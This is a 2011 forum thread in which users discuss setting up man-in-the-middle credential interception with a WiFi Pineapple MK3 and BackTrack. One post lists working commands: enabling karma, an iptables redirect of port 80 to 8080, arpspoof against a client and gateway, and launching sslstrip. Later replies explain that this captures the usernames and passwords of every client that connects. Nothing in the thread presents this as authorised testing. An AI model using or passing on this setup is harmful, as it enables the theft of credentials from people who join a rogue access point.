diggler Posted December 9, 2011 Share Posted December 9, 2011 G'day Gents (& Gals?), Now that most of us have figured out how to flash and setup our MK3's, I'd like to start a discussion thread about what can be achieved next. Can one of the experts here provide some insight for how to route tools like SSLSTRIP + DSNIFF on the host OS (ex. BT5R1); a few have pointed out that there are storage limitations for logging data with tools that are built into the MK3 interface, such as, ngrep. Also, because we are already the MITM with the MK3 do we need to change iptables & use arpspoof? I don't want to bork the ./wp3.sh config for the MK3 by messing with routing, etc, when trying to configure SSLTRIP. This tool is awesome guys, really fun stuff... Thanks :) Diggs Quote Link to comment Share on other sites More sharing options...
itsm0ld Posted December 10, 2011 Share Posted December 10, 2011 Have you looked at the wp3 script? It will take you through all the steps needed to get get internet sharing and routing setup in backtrack. From that point SSL strip is setup just like has been described many times and since it will be running on your laptop you wont have the space limitations of the pineapple. If your interested I can post up the script I use with my pineapples, its a little more work to get working but it has tcpdump to log all packets for offline mining , SSL strip, and also takes care of the ip forwarding and internet sharing in BT5 R1. Quote Link to comment Share on other sites More sharing options...
diggler Posted December 10, 2011 Author Share Posted December 10, 2011 Definitely would be interesting to see the script you use. wp3.sh seems to create the necessary allow IP forward rule (from 0 to 1). I found I was able to get ssl strip to work (which I'm completely knew to) by doing the following: - enable wifi pineapple (flashed to v1.9) & activate karma- enable iptables (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080)- enable arpspoof (arpspoof -i eth1 172.16.42.178 172.16.42.1)- enable sslstrip (chmod +x sslstrip.py --> ./sslstrip.py -l 8080) Have you looked at the wp3 script? It will take you through all the steps needed to get get internet sharing and routing setup in backtrack. From that point SSL strip is setup just like has been described many times and since it will be running on your laptop you wont have the space limitations of the pineapple. If your interested I can post up the script I use with my pineapples, its a little more work to get working but it has tcpdump to log all packets for offline mining , SSL strip, and also takes care of the ip forwarding and internet sharing in BT5 R1. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 10, 2011 Share Posted December 10, 2011 (edited) I was debating editing the wp3.sh to ask if you want to start SSL Strip and throw exception if it isn't installed and working. But soon it may be implemented into the pineapple by forms of magic... MAYBE Edited December 10, 2011 by Mr-Protocol Quote Link to comment Share on other sites More sharing options...
diggler Posted December 10, 2011 Author Share Posted December 10, 2011 (edited) haha! freakin' awesome -- you guys rock! Mr-Protocol: how would that be possible? Can you explain the logic at all? What doesn't make sense to me is that I was trying to get ettercap to work earlier for the same reason. I wanted to automate and make the setup easier but ultimately I couldn't automate SSLSTRIP as much as I wanted because you have to select a client and host IP for ARPSPOOF. The "BIG" technical question in my head is can SSLSTRIP be ran against the AP and all traffic instead of individual clients? So it will literally create a net and capture all U/P for clients that connect to MK3. Thoughts? I was debating editing the wp3.sh to ask if you want to start SSL Strip and throw exception if it isn't installed and working. But soon it may be implemented into the pineapple by forms of magic... MAYBE Edited December 10, 2011 by diggler Quote Link to comment Share on other sites More sharing options...
itsm0ld Posted December 10, 2011 Share Posted December 10, 2011 haha! freakin' awesome -- you guys rock! Mr-Protocol: how would that be possible? Can you explain the logic at all? What doesn't make sense to me is that I was trying to get ettercap to work earlier for the same reason. I wanted to automate and make the setup easier but ultimately I couldn't automate SSLSTRIP as much as I wanted because you have to select a client and host IP for ARPSPOOF. The "BIG" technical question in my head is can SSLSTRIP be ran against the AP and all traffic instead of individual clients? So it will literally create a net and capture all U/P for clients that connect to MK3. Thoughts? SSL strip will run against ALL clients since you will be running it on the laptop against the Ethernet interface connected to your pineapple. And like we said no arpspoof required =) Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 10, 2011 Share Posted December 10, 2011 A lil tipsy right now, but basically what happens is an iptables entry is made to forward all SSL traffic (port) to the SSLStrip listener which SSLStrip forwards it on and does it's magic. So it would work on all clients not on an individual basis. It's basically just a simplified proxy in the middle of the connection, almost like privoxy. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.